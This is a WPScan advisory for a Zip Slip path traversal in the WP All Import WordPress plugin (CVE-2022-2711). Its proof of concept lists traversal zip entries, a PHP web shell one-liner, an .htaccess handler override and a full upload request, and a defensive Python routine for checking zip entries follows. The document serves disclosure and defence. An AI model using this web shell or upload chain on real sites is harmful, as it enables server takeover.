WPScan

WordPress Plugin Vulnerabilities

WP All Import < 3.6.9 - Admin+ Directory traversal via file upload

Description

The plugin does not validate the paths of files contained in uploaded zip archives (a Zip Slip condition), allowing highly privileged users, such as admins, to write arbitrary files to any part of the file system accessible by the web server via a path traversal vector.


Proof of Concept

[1] Download 'poc.zip' via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip'

 poc.zip contains the 2 files below
 -> '../../../../../../../../../../var/www/html/exploit.php.txt'
 -> '../../../../../../../../var/www/html/.htaccess'

 [1-1] '../../../../../../../../../../var/www/html/exploit.php.txt' is as follows.
 ----------------------------------
 <?php system($_GET['cmd']); ?>
 ----------------------------------

 [1-2] '../../../../../../../../var/www/html/.htaccess' is as follows.
 ----------------------------------
 <IfModule mod_rewrite.c>
 [same as the existing .htaccess data]
 AddHandler application/x-httpd-php .php .html
 </IfModule>
 ----------------------------------

[2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import'

[3] Access 'http://localhost/exploit.php.txt?cmd=id' in order to execute arbitrary commands.


[+++] PoC Request Packet Sample
POST /wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=afb6fb6e5c HTTP/1.1
Host: localhost
Content-Length: 1333
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhApgY7BhUu88AGu
Accept: */*
Origin: http://localhost
Referer: http://localhost/wp-admin/admin.php?page=pmxi-admin-import
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [wordpress-admin-cookie]
Connection: close

------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="name"

poc.zip
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="async-upload"; filename="poc.zip"
Content-Type: application/zip

[poc.zip payload]
[ - you can download it via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip']
------WebKitFormBoundaryrhApgY7BhUu88AGu-- 
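As an added, defender-side illustration (not code from the advisory or from the plugin), this is the entry-name validation an importer needs before writing any archive member to disk: it builds an in-memory archive with the same entry names as the PoC's poc.zip (placeholder bodies only), flags the traversal entries, and extracts only the safe one. The function names are my own.

```python
import io
import os
import tempfile
import zipfile
from typing import List, Tuple

def is_traversal_name(name: str) -> bool:
    """True if a zip entry name could land outside the extraction directory."""
    # Reject absolute paths, drive letters and any '..' component (normalising backslashes first).
    normalised = name.replace("\\", "/")
    if normalised.startswith("/") or (len(normalised) > 1 and normalised[1] == ":"):
        return True
    return ".." in normalised.split("/")

def audit_archive(zip_bytes: bytes) -> List[str]:
    """Names of entries in an uploaded archive that fail the traversal check."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist() if is_traversal_name(name)]

def safe_extract(archive: zipfile.ZipFile, dest: str) -> List[str]:
    """Extract only entries that resolve inside dest; return the rejected names."""
    dest_real = os.path.realpath(dest)
    rejected = []
    for info in archive.infolist():
        # Independent second guard: compare the resolved target path, not just the name.
        target = os.path.realpath(os.path.join(dest_real, info.filename))
        inside = os.path.commonpath([dest_real, target]) == dest_real
        if is_traversal_name(info.filename) or not inside:
            rejected.append(info.filename)
        else:
            archive.extract(info, dest_real)
    return rejected

def build_sample_archive() -> bytes:
    """Constructed in memory with the entry names of the advisory's poc.zip; bodies are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("../../../../../../../../../../var/www/html/exploit.php.txt", "placeholder")
        zf.writestr("../../../../../../../../var/www/html/.htaccess", "placeholder")
        zf.writestr("import/data.csv", "id,title\n1,hello\n")  # legitimate import data
    return buf.getvalue()

def extract_sample_safely() -> Tuple[List[str], List[str]]:
    """Extract the sample into a throwaway directory; return (files written, entries rejected)."""
    with tempfile.TemporaryDirectory() as dest, zipfile.ZipFile(io.BytesIO(build_sample_archive())) as zf:
        rejected = safe_extract(zf, dest)
        written = sorted(os.path.relpath(os.path.join(root, f), dest)
                         for root, _, files in os.walk(dest) for f in files)
    return written, rejected
```

The name check alone would have blocked the PoC archive; the realpath comparison is kept as a second layer for the day the name check meets a form it does not cover.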

Affects Plugins

wp-all-import
Fixed in version 3.6.9

References

CVE
CVE-2022-2711

Classification

Type

TRAVERSAL

OWASP top 10
A1: Injection
CWE
CWE-22

Miscellaneous

Original Researcher

lucy

Submitter

lucy

Verified

Yes

WPVDB ID
11e73c23-ff5f-42e5-a4b0-0971652dcea1

Timeline

Publicly Published

2022-10-14

Added

2022-10-15

Last Updated

2022-10-17
